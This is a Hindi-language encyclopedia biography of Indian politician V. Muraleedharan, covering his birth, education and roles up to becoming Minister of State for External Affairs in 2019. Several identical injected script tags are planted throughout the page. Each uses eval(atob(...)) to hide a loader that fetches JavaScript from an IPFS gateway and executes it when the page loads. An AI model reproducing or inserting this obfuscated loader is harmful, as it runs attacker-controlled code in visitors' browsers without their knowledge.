वी. मुरलीधरन
वी. मुरलीधरन
| |
पूरा नाम | वी. मुरलीधरन |
जन्म | 12 दिसंबर, 1958 |
जन्म भूमि | ज़िला कन्नूर, केरल |
अभिभावक | पिता- गोपालन वेन्नाथन वित्तिल, माता- देवकी नाम्बल्ली वेल्लम वेल्ली |
पति/पत्नी | डॉ. के. एस. जयश्री |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
कार्य काल | राज्य मंत्री, विदेश मंत्रालय- 30 मई, 2019 से |
विद्यालय | गवर्नमेंट ब्रेनन कॉलेज, थालास्सेरी, केरल |
अन्य जानकारी | अप्रॅल 2018 में वी. मुरलीधरन महाराष्ट्र से राज्यसभा के सदस्य चुने गए। जून 2018 में उन्हें विदेश मामलों की स्थायी समिति के सदस्य के रूप में मनोनीत किया गया था। |
अद्यतन | 15:24, 16 अगस्त 2020 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>वी. मुरलीधरन (अंग्रेज़ी: V. Muraleedharan, जन्म- 12 दिसंबर, 1958, ज़िला कन्नूर, केरल) भारतीय राजनीतिज्ञ हैं। उनका सम्बंध देश के राजनीतिक दल भारतीय जनता पार्टी से है। 30 मई, 2019 को भारत के राष्ट्रपति ने उन्हें केंद्रीय राज्यमंत्री के रूप में शपथ दिलाई। मोदी मंत्रिमण्डल में वी. मुरलीधरन विदेश और संसदीय कार्यों के मंत्री बनाये गए हैं।
परिचय
12 दिसंबर, 1958 को केरल के कन्नूर जिले में गोपालन वेन्नाथन वित्तिल और देवकी नाम्बल्ली वेल्लम वेल्ली के यहां जन्मे वी. मुरलीधरन को 30 मई, 2019 को भारत के राष्ट्रपति ने केंद्रीय राज्यमंत्री के रूप में शपथ दिलाई। वी. मुरलीधरन ने आधिकारिक रूप में केंद्रीय विदेश राज्यमंत्री और संसदीय मामले के राज्यमंत्री के रूप में 31 मई, 2019 को कार्यभार संभाला। उनका विवाह डॉ. के. एस. जयश्री से हुआ है।[1]
प्रारंभिक गतिविधियाँ
वी. मुरलीधरन ने केरल के थालास्सेरी के गवर्नमेंट ब्रेनन कॉलेज से अंग्रेज़ी और साहित्य में स्नातक करने के बाद सामाजिक-राजनीतिक मामलों में एक कार्यकर्ता के रूप में अपनी यात्रा आरंभ की। इसने उनके अनुभव को काफी समृद्ध किया। 1999 से लेकर 2002 तक वे भारत सरकार के युवा मामले और खेल मंत्रालय के अधीन नेहरू युवा केंद्र के उपाध्यक्ष और बाद में 2002 से लेकर 2004 तक नेहरू युवा केंद्र के महानिदेशक जैसे विभिन्न पदों पर रहे।
राजनीतिक कॅरियर
अप्रॅल 2018 में वी. मुरलीधरन महाराष्ट्र से राज्यसभा के सदस्य चुने गए। जून 2018 में उन्हें विदेश मामलों की स्थायी समिति के सदस्य के रूप में मनोनीत किया गया था। जून 2018 में ही उन्हें रेल मंत्रालय के सलाहकार समिति के सदस्य के रूप में भी नियुक्त किया गया था। इसके बाद दिसंबर 2018 में उन्हें नियमों से संबंधित समिति के सदस्य के रूप में नियुक्त किया गया।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ श्री वी. मुरलीधरन (हिंदी) mea.gov.in। अभिगमन तिथि: 16 अगस्त, 2020।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>